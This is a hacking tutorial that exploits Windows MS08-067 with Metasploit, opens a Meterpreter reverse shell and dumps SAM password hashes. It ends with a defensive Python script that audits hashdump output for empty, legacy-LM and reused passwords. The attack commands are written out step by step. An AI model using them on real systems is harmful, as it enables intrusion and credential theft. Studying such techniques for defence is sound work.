Hack Like a Pro: How to Remotely Grab Encrypted Passwords from a Compromised Computer
Welcome back, my fledgling hackers!
There's an evil dictator hellbent on destroying the world, and in one of our last hacks, we successfully compromised his computer and saved the world from nuclear annihilation. Then, we covered our tracks so no one would know what we did, and developed a hack to capture screenshots of his computer periodically so we could keep track of what he was up to next.
With this new hack, we'll capture the passwords from the maniacal dictator's computer so that we can access his PC through his account, or anyone else's account on his computer, including the most important one: the system administrator's.
Windows systems store passwords in encrypted form inside a file called the SAM file, located at c:\windows\system32\config\sam. If we can gain access to his computer, as we've already done, we can grab a copy of the encrypted passwords, transfer them to our computer, and then crack them later at our leisure.
So, let's fire up our trusty framework hacking tool, Metasploit, and let's go grab those passwords!
Once again, let's use a tried and true exploit; type:
- msf > use exploit/windows/smb/ms08_067_netapi
Now, let's set the payload to our all-powerful Meterpreter.
- msf (ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
It's always a good idea at this point to check our options with show options.
As you can see, we'll need both the LHOST (the IP address of our computer) and RHOST (the IP address of the victim computer). Let's set these now.
- msf (ms08_067_netapi) > set RHOST 192.168.1.108
- msf (ms08_067_netapi) > set LHOST 192.168.1.109
With everything set, now all that's left to do is exploit!
- msf (ms08_067_netapi) > exploit
We now have a Meterpreter terminal prompt on the maniacal dictator's computer!
As you've seen in my previous tutorials, the Meterpreter has several powerful scripts built in. In this case, we'll be using one called hashdump.
Just a bit of explanation before we grab those passwords...
For security purposes, most operating systems (including all of the modern Windows operating systems) store user passwords as hashes rather than in plaintext. A hash is the output of a one-way function (hashing, not reversible encryption): it makes the passwords unreadable to humans and cannot be run backwards to recover the original password. These hashes are what we're after, hence the script is called hashdump.
So, let's go ahead and grab those hashes!
- meterpreter > hashdump
As you can see, we now have several users and their encrypted password hashes. Of course, right now we can't read them, but come back for my next tutorial and I'll show you how to crack them so that we can use them at our leisure.
Remember, once we have the maniacal dictator's password, it's likely that he uses that same password on systems other than this one (e.g. email, secure areas, etc.), giving us access to many of his secure assets.
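The two points above, that hashdump hands us hashes rather than readable passwords and that people reuse passwords across accounts, are exactly what a defender looks for when reviewing a hash dump from their own systems. The following Python script is an added example for this article, not code from the original tutorial or from Metasploit. It parses output in the hashdump format (user:rid:lmhash:nthash:::) and flags three hygiene problems: accounts whose NT hash is the well-known hash of the empty password, accounts that still have an LM hash stored (the legacy format that is trivially cracked; when LM storage is disabled, hashdump shows the fixed placeholder aad3b435b51404eeaad3b435b51404ee), and accounts that share the same NT hash, which means they share the same password. The sample dump lines are constructed for the example and are not hashes from any real system.

```python
"""Audit hashdump-style output for weak credential hygiene.

Added example for this article; the input format is the one Meterpreter's
hashdump prints, the logic is our own. Sample data below is constructed.
"""
from collections import defaultdict

# Well-known, public constants: the LM and NT hashes of the empty password.
# hashdump also prints EMPTY_LM as a placeholder when LM hashes are not stored.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample in hashdump format (user:rid:lmhash:nthash:::).
# The non-empty hash values are made-up hex, not hashes of real passwords.
SAMPLE_DUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
dictator:1000:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
minion:1001:0011223344556677889900aabbccddee:fedcba9876543210fedcba9876543210:::
"""


def parse_hashdump(text):
    """Turn hashdump text into a list of {user, rid, lm, nt} records."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        parts = line.split(":")
        if len(parts) < 4:
            raise ValueError(f"malformed hashdump line: {line!r}")
        records.append({
            "user": parts[0],
            "rid": int(parts[1]),
            "lm": parts[2].lower(),
            "nt": parts[3].lower(),
        })
    return records


def audit(records):
    """Return (subject, problem) findings for empty, LM-stored and reused passwords."""
    findings = []
    users_by_nt = defaultdict(list)
    for rec in records:
        if rec["nt"] == EMPTY_NT:
            findings.append((rec["user"], "empty password"))
        if rec["lm"] != EMPTY_LM:
            findings.append((rec["user"], "LM hash stored (weak legacy format)"))
        users_by_nt[rec["nt"]].append(rec["user"])
    # Identical NT hashes mean identical passwords; skip the empty-password group,
    # which is already reported per account above.
    for nt, users in users_by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:
            findings.append((",".join(sorted(users)), "same password shared across accounts"))
    return findings


if __name__ == "__main__":
    for subject, problem in audit(parse_hashdump(SAMPLE_DUMP)):
        print(f"{subject}: {problem}")
```

Run on the constructed sample, the script reports the Guest account as having an empty password, minion as still storing an LM hash, and Administrator and dictator as sharing one password. The reuse check works purely on the hashes, with no cracking needed, which is why a blue team can run it over its own SAM or domain exports to find shared passwords before an attacker does.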